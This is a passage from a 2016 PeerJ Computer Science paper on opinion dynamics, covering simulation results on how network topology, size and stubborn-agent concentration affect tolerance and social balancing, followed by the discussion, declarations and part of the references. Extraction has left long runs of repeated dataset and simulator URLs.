θi(t − 1) ± α0/1ε0/1, where both α0ε0 = 0 and α1ε1 = 0 imply small variation in θi(t). In such a case, for a relatively stable tolerance, the stationarity can also be described as in Acemoglu et al. (2013) (where θ is assumed as fixed). Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 24/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Phase transition in opinion dynamics This section aims at analyzing the impact of topology, network size, interaction model, stubborn agent placement, ratio and concentration on the opinion change (ω), and on convergence towards intolerance (θ ). Simulations show that, in a society with a fixed stubborn agent distribution, the topology τ determines if: • the society enters the intolerance phase I: θ → 0 (with θ < 0.1), which also results in ω → 0; • the society balances and never enters the intolerance phase I: θ → θlimit, where θlimit > 0.1 and maintains a high ω; • the society continues to oscillate for 0.1 < θ < 1, but the tolerance level does not stabilize. In case of the Yelp dataset, we notice that for a given topology τ , and a network of size N , when the concentration of stubborn agents is bigger than a critical ratio σ , the society never becomes intolerant. In such cases, the society becomes balanced, with slight oscillation in tolerance or opinion change. The goal is therefore to find the tuples (τ , N , σ ) at which this phenomenon occurs. To obtain our results we have used five topologies τ (mesh, random, small-world, BA and WSDD), network sizes N of 400 up to 100,000 nodes, our new tolerance interaction model, a ratio of 1:1 between green (1) and red (0) stubborn agents, and an increasing concentration of stubborn agents ranging from 1% to 36%. Impact of topology The tolerance and opinion change with respect to the number of stubborn agents, as depicted in Figs. 12A and 12B highlight a clear difference between the five topologies, namely mesh, random, small-world, BA, and WSDD. There is a total of three clearly distinguishable behaviors: a responsive behavior (present in small-worlds and random graphs), a linear behavior (for mesh networks), and a saturated behavior (corresponding to BA and WSDD networks). The tolerance increases linearly for the mesh, as the population of stubborn agents increases. Consequently, there is no critical σ for which a phase transition occurs due to the high regularity of the network, but there is a visible saturation point (when the blue graph begins to drop in Fig. 12A). This happens because the society is physically filled with more stubborn agents than regular ones and because all stubborn agents have θ = 0, the overall tolerance begins to drop. The responsive behavior exhibited by the random network and small-world networks suggests that these two topologies behave similarly in the context of opinion source saturation. The two topologies are almost identical under the conditions defined here, as they behave almost as the opposite of mesh networks: once the critical point σ is reached, their tolerance rises to the maximum value. Then, as the stubborn agents population increases, the tolerance and opinion change values decrease proportionally. The random Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 25/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 Figure 12 Tolerance (θ ) and opinion change (ω) evolution with the increasing concentration of evenly distributed stubborn agents (SA) and increasing network sizes. values over the five topologies for an increasing concentration of evenly distributed stubborn agents. (A) and (B) θ and ω respective values, over the five topologies when the size of the network is fixed as N = 2,500, and the concentration of stubborn agents ranges from 4% to 36%. (D), (D), (E), and (F) Tolerance θ stabilization values at which social balancing occurs over increasing network sizes (N = 400–2,500 nodes) on mesh, small-world, BA, and WSDD networks, respectively. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 26/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 and small-world topologies are equivalent with the mesh topology as the society becomes saturated with stubborn agents (i.e., see Figs. 12A and 12B in terms of tolerance θ and opinion change ω, respectively). Finally, the saturated behavior groups together the BA and WSDD topologies, both of which have the feature of degree-driven preferential attachment. The two topologies show smaller responsiveness to social balancing. As depicted in Figs. 12A and 12B, the critical point of stubborn agents concentration for BA is by far the greatest one (i.e., σ = 16%) and the maximum tolerance θ reached is the smallest among the simulations aiming at the impact of topology (20%). The WSDD topology shows a better response, at a much lower critical stubborn agents concentration point (σ = 4%) and reaches social balance at θ = 30%. Impact of network size When analyzing the opinion change at society level, the same observations and classifi- cation are valid for all other network sizes. The larger the size N is, the more accurate the delimitation shown in Figs. 12A and 12B becomes. The impact of size offers a comparison of different tolerance stabilization on the same topology. The results in Figs. 12C–12F show how well the social balancing effect scales with increasing sizes of the network. The behavior of meshes, presented in Fig. 12C, shows a linearly proportional increase of the critical stubborn agents concentration σ (around 20–25%) in accordance with the network size N . A similar evolution is visible in Fig. 12F, on networks with preferential attachment, where the required σ is also proportionally bigger on larger networks. In Figs. 12D and 12E, the random and small-world networks exhibit similar behavioral patterns: they achieve the critical point σ with maximal opinion change, and then evolve towards intolerance at a pace that is corroborated with N (i.e., a slower drop in tolerance for larger networks occurs). The results presented in Fig. 12 contains averages stemming from multiple experiments run in SocialSim, then processed separately in Microsoft Excel. In Figs. 12C–12F, the points on the OX axis are fixed SA concentrations which are used throughout these exper- iments, and the values on the OY axis are averages obtained from multiple runs (i.e., 10). An individual graph from one sub-figure is based on 8 (different SA concentrations) ×10 experiments = 80 simulations. One subfigure is the result of 3 × 80 = 240 simulations, therefore Fig. 12 is based on 4 × 240 = 960 simulations. All simulations presented in this section confirm our main observations (Twitter, MemeTracker, Yelp) on opinion formation phases and phase transition towards social balancing. DISCUSSION The results for the proposed tolerance-based opinion interaction model show that, if indi- vidual traits are considered for modeling social agents, then we can realistically reproduce real-world dynamical features of opinion formation such as opinion formation phases, as well as their evolution towards social balancing. At the same time, we demonstrate that the dynamics of opinion formation is influenced by topology, network size and stubborn agent Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 27/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 (opinion source) distribution across the entire population. Overall, the topology seems to have the strongest influence on opinion formation and spread; this can be summarized by the following different tendencies: • Responsive behavior: Tolerance stabilization is attained right after reaching a relatively low critical ratio of stubborn agents. Inserting additional stubborn agents entail a drop in autonomy and opinion flow. Such a behavior is achieved by random and small-world topologies, and it can be motivated by the uniform degree distribution and the existence of both local and long-range links, which foster opinion diversity and social balancing; this can be representative for a decentralized and democratic society. • Linear behavior: The critical threshold at which tolerance becomes stable for mesh topologies increases linearly with the stubborn agents concentration. The mesh topology corresponds to a limited, almost “autistic” social interaction behavior (where each agent only interacts with close proximity neighbors); therefore, the probability of opinion diversity only increases with the proportional addition of stubborn agents. For meshes, social balancing is attained only if a substantial number of stubborn agents is inserted. • Saturated behavior: Tolerance converges slowly around a specific low value. This behavior is achieved in BA and WSDD networks. Due to the nature of these topologies, even though long-range links exist, nodes tend to be preferentially attached to the same hub nodes, meaning the same opinion sources. The amount of stubborn agents required to reach social balance is much higher and the resulting balance saturates quickly. It is thus a conservative, stratified and oligarchic type of society which reacts later and slower to new stimuli. Most individuals within this type of society remain intolerant and opinion change is treated as suspicious and non-credible. Besides these original contributions, the results obtained with our model confirm prior studies which show how individuals converge towards the state of their ingroup (Moons et al., 2009; Van Der Schalk et al., 2011). This is especially noticeable on networks with high modularity, like the WSDD network in which every member in a community converges towards the community’s dominant opinion, yet every community converges towards a different state. An important real-world aspect of our new tolerance model (which assumes that the level of acceptance of neighboring opinions evolves over time) is that the tolerance level of an agent θi(t) is proportional to the degree of the node. In other words, the more neighbors a node has, the more likely it is to receive different influences which can guarantee a higher tolerance level. This observation is backed up by a recent study which proves that individuals with a higher (in)degree are less likely to be influenced, and the influence of friends is not significantly moderated by their friends’ indegree and friendship reciprocity (Geven, Weesie & Van Tubergen, 2013). The results rendered with our tolerance model also fall in line with a research direction started by Gross & Blasius (2008) where the authors show that there is a self-organization in all adaptive networks, including multi-agent opinion networks. Our real-world Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 28/33 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.42 observations and opinion simulation results show a similar topological self-organization based on stubborn agent topological properties. Finally, the study of opinion dynamics through our proposed concept of social balancing shows key features that may be used in practical applications, like marketing or conflict resolution. Under the requirement of keeping the social state stable, while never reaching intolerance, we provide a classification of network topologies based on the social balancing property. Networks with the democratic small-world structure promote balancing; the phenomenon is also exhibited if there is a high concentration of stubborn agents to stabilize opinion in mesh networks. If there are significantly fewer stubborn agents in the network, balancing will only be achieved if one side is using a placement strategy to counter its rivals (Gionis, Terzi & Tsaparas, 2013). A small-world network will not offer an advantage to any of the opinions due the link layout and uniform degree distribution. On the other hand, the oligarchic scale-free topology shows a clear importance of strategically placed agents in hub nodes which intrinsically render the opposing nodes on lower levels of the tree virtually powerless. The balancing phenomenon does not occur in networks with scale-free properties. Clearly, the social balancing concept remains open for further debate, improvement, and real-world validation. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Radu Marculescu is an Academic Editor for PeerJ Computer Science. Author Contributions • Alexandru Topirceanu and Mihai Udrescu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Mircea Vladutiu conceived and designed the experiments, analyzed the data, reviewed drafts of the paper. • Radu Marculescu conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Our social network interaction simulator SocialSim is available at: https://sites.google.com/site/alexandrutopirceanu/projects/socialsim. and www.cs.upt.ro/∼alext/socialsim. For our analysis, we also used the following publicly available datasets. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 29/33 https://peerj.com/computer-science/ https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim https://sites.google.com/site/alexandrutopirceanu/projects/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://www.cs.upt.ro/~alext/socialsim http://dx.doi.org/10.7717/peerj-cs.42 The Meme Tracker dataset: http://snap.stanford.edu/data/memetracker9.html. The Twitter dataset: http://snap.stanford.edu/data/twitter7.html. The Yelp dataset: http://www.yelp.com/dataset challenge. REFERENCES Acemoglu D, Como G, Fagnani F, Ozdaglar A. 2013. Opinion fluctuations and disagreement in social networks. Mathematics of Operations Research 38(1):1–27 DOI 10.1287/moor.1120.0570. Acemoglu D, Ozdaglar A. 2011. Opinion dynamics and learning in social networks. Dynamic Games and Applications 1(1):3–49 DOI 10.1007/s13235-010-0004-1. Acemoglu D, Ozdaglar A, Yildiz E. 2011. Diffusion of innovations in social networks. In: Decision and control and European control conference (CDC-ECC), 2011 50th IEEE conference on. IEEE, 2329–2334 DOI 10.1109/CDC.2011.6160999. Albert R, Barabási A-L. 2002. Statistical mechanics of complex networks. Reviews of Modern Physics 74(1):47–97 DOI 10.1103/RevModPhys.74.47. Axelrod R. 1997. The dissemination of culture a model with local convergence and global polarization. Journal of Conflict Resolution 41(2):203–226 DOI 10.1177/0022002797041002001. Bandyopadhyay S, Rao AR, Sinha BK, Sinha BK. 2011. Models for social networks with statistical applications. Vol. 13. Sage. Barabási A-L, Albert R. 1999. Emergence of scaling in random networks. Science 286(5439):509–512 DOI 10.1126/science.286.5439.509. Biswas S, Chandra AK, Chatterjee A, Chakrabarti BK. 2011. Phase transitions and non-equilibrium relaxation in kinetic models of opinion formation. In: Journal of physics: conference series, vol. 297. IOP Publishing, 012004 DOI 10.1088/1742-6596/297/1/012004. Catanzaro M, Boguna M, Pastor-Satorras R. 2005. Generation of uncorrelated random scale-free networks. Physical Review E 71(2):027103 DOI 10.1103/PhysRevE.71.027103. Centola D, Macy M. 2007. Complex contagions and the weakness of long ties1. American Journal of Sociology 113(3):702–734 DOI 10.1086/521848. Chau H, Wong C, Chow F, Fung C-HF. 2014. Social judgment theory based model on opinion formation, polarization and evolution. Physica A: Statistical Mechanics and its Applications 415:133–140 DOI 10.1016/j.physa.2014.07.082. Chen G, Wang X, Li X. 2014. Fundamentals of complex networks: models, structures and dynamics. John Wiley & Sons. Chen Y, Zhang L, Huang J. 2007. The watts–strogatz network model developed by including degree distribution: theory and computer simulation. Journal of Physics A: Mathematical and Theoretical 40(29):8237–8246 DOI 10.1088/1751-8113/40/29/003. Clarkson JJ, Tormala ZL, Rucker DD, Dugan RG. 2013. The malleable influence of social consensus on attitude certainty. Journal of Experimental Social Psychology 49(6):1019–1022 DOI 10.1016/j.jesp.2013.07.001. Das A, Gollapudi S, Munagala K. 2014. Modeling opinion dynamics in social networks. In: Proceedings of the 7th ACM international conference on Web search and data mining. ACM, 403–412 DOI 10.1145/2556195.2559896. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 30/33 https://peerj.com/computer-science/ http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/memetracker9.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://snap.stanford.edu/data/twitter7.html http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://www.yelp.com/dataset_challenge http://dx.doi.org/10.1287/moor.1120.0570 http://dx.doi.org/10.1007/s13235-010-0004-1 http://dx.doi.org/10.1109/CDC.2011.6160999 http://dx.doi.org/10.1103/RevModPhys.74.47 http://dx.doi.org/10.1177/0022002797041002001 http://dx.doi.org/10.1126/science.286.5439.509 http://dx.doi.org/10.1088/1742-6596/297/1/012004 http://dx.doi.org/10.1103/PhysRevE.71.027103 http://dx.doi.org/10.1086/521848 http://dx.doi.org/10.1016/j.physa.2014.07.082 http://dx.doi.org/10.1088/1751-8113/40/29/003 http://dx.doi.org/10.1016/j.jesp.2013.07.001 http://dx.doi.org/10.1145/2556195.2559896 http://dx.doi.org/10.7717/peerj-cs.42 Deffuant G, Neau D, Amblard F, Weisbuch G. 2000. Mixing beliefs among interacting agents. Advances in Complex Systems 3(01n04):87–98 DOI 10.1142/S0219525900000078. Deng L, Liu Y, Xiong F. 2013. An opinion diffusion model with clustered early adopters. Physica A: Statistical Mechanics and its Applications 392(17):3546–3554 DOI 10.1016/j.physa.2013.03.058. Duma A, Topirceanu A. 2014. A network motif based approach for classifying online social networks. In: Applied computational intelligence and informatics (SACI), 2014 IEEE 9th international symposium on. IEEE, 311–315 DOI 10.1109/SACI.2014.6840083. Easley D, Kleinberg J. 2010. Networks, crowds, and markets. Vol. 8. Cambridge Univ Press. Elkind D. 1967. Egocentrism in adolescence. Child Development 38(4):1025–1034 DOI 10.2307/1127100. Erdös P, Rényi A. 1960. On the evolution of random graphs. Publications of the Mathematical Institute of the Hungarian Academy of Sciences 5:17–61. Fang H, Zhang J, Thalmann NM. 2013. A trust model stemmed from the diffusion theory for opinion evaluation. In: Proceedings of the 2013 international conference on autonomous agents and multi-agent systems. International Foundation for Autonomous Agents and Multiagent Systems, 805–812. Fonseca A. 2011. Modeling political opinion dynamics through social media and multi-agent simulation. In: First doctoral workshop for complexity sciences. Fu P, Liao K. 2006. An evolving scale-free network with large clustering coefficient. In: Control, automation, robotics and vision, 2006. ICARCV’06. 9th international conference on. IEEE, 1–4 DOI 10.1109/ICARCV.2006.345053. Galuba W, Aberer K, Chakraborty D, Despotovic Z, Kellerer W. 2010. Outtweeting the twitterers-predicting information cascades in microblogs. In: Proceedings of the 3rd conference on Online social networks, vol. 39. 3–3. Geven S, Weesie J, Van Tubergen F. 2013. The influence of friends on adolescents behavior problems at school: the role of ego, alter and dyadic characteristics. Social Networks 35(4):583–592 DOI 10.1016/j.socnet.2013.08.002. Gionis A, Terzi E, Tsaparas P. 2013. Opinion maximization in social networks. ArXiv preprint. arXiv:1301. Golbeck J. 2013. Analyzing the social web. 1st edition. San Francisco: Morgan Kaufmann Publishers Inc. Gross T, Blasius B. 2008. Adaptive coevolutionary networks: a review. Journal of the Royal Society Interface 5(20):259–271 DOI 10.1098/rsif.2007.1229. Guille A, Hacid H, Favre C, Zighed DA. 2013. Information diffusion in online social networks: a survey. ACM SIGMOD Record 42(2):17–28 DOI 10.1145/2503792.2503797. Hegselmann R, Krause U. 2002. Opinion dynamics and bounded confidence models, analysis, and simulation. Journal of Artificial Societies and Social Simulation 5(3). Holme P, Kim BJ. 2002. Growing scale-free networks with tunable clustering. Physical Review E 65(2):026107 DOI 10.1103/PhysRevE.65.026107. Hołyst JA, Kacperski K, Schweitzer F. 2000. Phase transitions in social impact models of opinion formation. Physica A: Statistical Mechanics and its Applications 285(1):199–210 DOI 10.1016/S0378-4371(00)00282-X. Hussain O, Anwar Z, Saleem S, Zaidi F. 2013. Empirical analysis of seed selection criterion in influence mining for different classes of networks. In: Cloud and green computing (CGC), 2013 third international conference on, IEEE, 348–353 DOI 10.1109/CGC.2013.61. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 31/33 https://peerj.com/computer-science/ http://dx.doi.org/10.1142/S0219525900000078 http://dx.doi.org/10.1016/j.physa.2013.03.058 http://dx.doi.org/10.1109/SACI.2014.6840083 http://dx.doi.org/10.2307/1127100 http://dx.doi.org/10.1109/ICARCV.2006.345053 http://dx.doi.org/10.1016/j.socnet.2013.08.002 http://arxiv.org/abs/1301 http://dx.doi.org/10.1098/rsif.2007.1229 http://dx.doi.org/10.1145/2503792.2503797 http://dx.doi.org/10.1103/PhysRevE.65.026107 http://dx.doi.org/10.1016/S0378-4371(00)00282-X http://dx.doi.org/10.1109/CGC.2013.61 http://dx.doi.org/10.7717/peerj-cs.42 Javarone MA, Squartini T. 2014. Conformism-driven phases of opinion formation on heterogeneous networks: the q-voter model case. ArXiv e-prints DOI 10.1088/1742-5468/2015/10/P10002. Jian-Guo L, Yan-Zhong D, Zhong-Tuo W. 2006. Multistage random growing small-world networks with power-law degree distribution. Chinese Physics Letters 23(3):746–749 DOI 10.1088/0256-307X/23/3/061. Kempe D, Kleinberg J, Tardos É. 2003. Maximizing the spread of influence through a social network. In: Proceedings of the ninth ACM SIGKDD international conference on Knowledge discovery and data mining. ACM, 137–146 DOI 10.1145/956750.956769. Lehmann J, Goncalves B, Ramasco JJ, Cattuto C. 2012. Dynamical classes of collective attention in twitter. In: Proceedings of the 21st international conference on World Wide Web. ACM, 251–260 DOI 10.1145/2187836.2187871. Lerman K, Yan X, Wu X-Z. 2015. The majority illusion in social networks. ArXiv preprint. arXiv:1506.03022. Li Y, Chen W, Wang Y, Zhang Z-L. 2013. Influence diffusion dynamics and influence maximization in social networks with friend and foe relationships. In: Proceedings of the sixth ACM international conference on Web search and data mining. ACM, 657–666 DOI 10.1145/2433396.2433478. Li Y, Qian X, Wang D. 2012. Extended hk evolving network model. In: Control and decision conference (CCDC), 2012 24th Chinese. IEEE, 4095–4097 DOI 10.1109/CCDC.2012.6243111. Li L, Scaglione A, Swami A, Zhao Q. 2011. Trust, opinion diffusion and radicalization in social networks. In: Signals, systems and computers (ASILOMAR), 2011 conference record of the forty fifth asilomar conference on. IEEE, 691–695 DOI 10.1109/ACSSC.2011.6190091. Li L, Scaglione A, Swami A, Zhao Q. 2012. Phase transition in opinion diffusion in social networks. In: Acoustics, speech and signal processing (ICASSP), 2012 IEEE international conference on. IEEE, 3073–3076 DOI 10.1109/ICASSP.2012.6288564. Maxwell JC. 1993. Developing the leader within you. Thomas Nelson Publishers. McDonald M, Wilson H. 2011. Marketing plans: how to prepare them, how to use them. Wiley. com. Moons WG, Leonard DJ, Mackie DM, Smith ER. 2009. I feel our pain: antecedents and consequences of emotional self-stereotyping. Journal of Experimental Social Psychology 45(4):760–769 DOI 10.1016/j.jesp.2009.04.016. Muchnik L, Aral S, Taylor SJ. 2013. Social influence bias: a randomized experiment. Science 341(6146):647–651 DOI 10.1126/science.1240466. Nyhan B, Reifler J. 2010. When corrections fail: the persistence of political misperceptions. Political Behavior 32(2):303–330 DOI 10.1007/s11109-010-9112-2. Pastor-Satorras R, Vespignani A. 2001. Epidemic spreading in scale-free networks. Physical Review Letters 86(14):3200–3203 DOI 10.1103/PhysRevLett.86.3200. Riolo RL, Cohen MD, Axelrod R. 2001. Evolution of cooperation without reciprocity. Nature 414(6862):441–443 DOI 10.1038/35106555. Roccas S, Amit A. 2011. Group heterogeneity and tolerance: the moderating role of conservation values. Journal of Experimental Social Psychology 47(5):898–907 DOI 10.1016/j.jesp.2011.03.011. Ruan Z, Iniguez G, Karsai M, Kertesz J. 2015. Kinetics of social contagion. ArXiv preprint. arXiv:1506.00251. Saito K, Ohara K, Yamagishi Y, Kimura M, Motoda H. 2011. Learning diffusion probability based on node attributes in social networks. In: Foundations of intelligent systems. Berlin Heidelberg: Springer, 153–162. Topirceanu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.42 32/33 https://peerj.com/computer-science/ http://dx.doi.org/10.1088/1742-5468/2015/10/P10002 